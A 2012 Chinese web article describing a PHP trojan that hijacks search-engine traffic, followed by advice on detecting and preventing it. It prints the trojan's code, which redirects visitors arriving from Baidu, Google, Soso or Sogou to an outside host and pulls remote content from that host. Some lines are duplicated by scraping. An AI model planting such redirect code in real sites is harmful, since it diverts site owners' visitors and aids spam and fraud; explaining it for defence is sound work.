介紹一個截取搜索引擎流量的 php木馬
來源: 瀏覽數(shù):
責(zé)任編輯:robert 時間:2012-03-02 21:34
責(zé)任編輯:robert 時間:2012-03-02 21:34
[導(dǎo)讀]
截取搜索引擎流量的php木馬很早就有了,它的作用便是將來自搜索引擎的流量轉(zhuǎn)移到目標(biāo)網(wǎng)站上去。因此,用戶搜索到的雖然是你的網(wǎng)站,打開的卻是別人的網(wǎng)站。
下面這段代碼是一個很簡單的示例,技術(shù)進步很快,這樣的木馬今天已經(jīng)不太可能再發(fā)揮作用了。但這種木馬的核心內(nèi)容卻是萬變不離其宗,只是手段更高明些罷了。好,以下便是轉(zhuǎn)移搜索引擎來路流量的php代碼:
error_reporting(E_ERROR);
header('content-Type:
text/html; charset=gb2312');
text/html; charset=gb2312');
$come_from="baidu.com#google.com.hk#soso.com#sogou.com#cache.baidu.com#google.cn";
$referer =
Split("#",$come_from) ;
Split("#",$come_from) ;
foreach($referer as $v)
{
if(stristr($_SERVER['HTTP_REFERER'],$v))
{
Header("Location:".'http://www.abc.com/3/nb.html?'.$_SERVER['SERVER_NAME']);
}
echo
file_get_contents('http://www.abc.com//xx/dn2.php');
file_get_contents('http://www.abc.com//xx/dn2.php');
}
?>
代碼十分簡單:如果訪問來源是baidu,google,soso或sogou等搜索引擎,那么將會定位到如下所述的html文件和php文件。
如何防范類似的攻擊呢?
首先是要經(jīng)??纯淳W(wǎng)站的IIS日志,如果有異??梢约霸绨l(fā)現(xiàn)??吹接心吧奈募蟠蜷_看看,有問題的話就直接刪除。其次常用的系統(tǒng)php文件也要經(jīng)常打開看看,檢查這些文件最近是否被修改過。如果有,那么下載下來,查找里面出現(xiàn)的陌生php文件名,比如出現(xiàn)了一個沒見過的dumy.php,可以搜索下dumy.php,看看是怎么回事。還有,一般別的目錄下還會另有木馬隱藏,在這里可以找到此蹤跡。最后也是最重要的,防患于未然,登錄口令要加強,不管是FTP賬號還是網(wǎng)站后臺地址和登錄名,或是別的什么密碼,如果太弱了,那么建議修改得更復(fù)雜些,這是最簡單也是最有效的安全措施。
網(wǎng)站安全應(yīng)該時刻銘記在心,你不在意,那些掛黑鏈的人可惦記你。
免責(zé)聲明:本文僅代表作者個人觀點,與納金網(wǎng)無關(guān)。其原創(chuàng)性以及文中陳述文字和內(nèi)容未經(jīng)本站證實,對本文以及其中全部或者部分內(nèi)容、文字的真實性、完整性、及時性本站不作任何保證或承諾,請讀者僅作參考,并請自行核實相關(guān)內(nèi)容。
- 分享到:
相關(guān)閱讀
- 有巨蟹座男朋友的女2017年06月21日
- 高校人才引進看重“2016年08月23日
- 視覺設(shè)計該如何賦予2016年08月23日
- 如何創(chuàng)造設(shè)計經(jīng)典2016年08月23日
- MLikeasong答互聯(lián)網(wǎng)軟件2016年08月19日
- 工業(yè)設(shè)計創(chuàng)業(yè)的誤區(qū)2016年08月18日
- 2016年北京理工大學(xué)工2015年08月10日
- 中國一線城市近8成白2015年08月04日
- 2010宅男腐女們的杯洗2015年08月04日
- 深圳長途搬家公司包2013年03月22日
精采專題
熱門文章
最新文章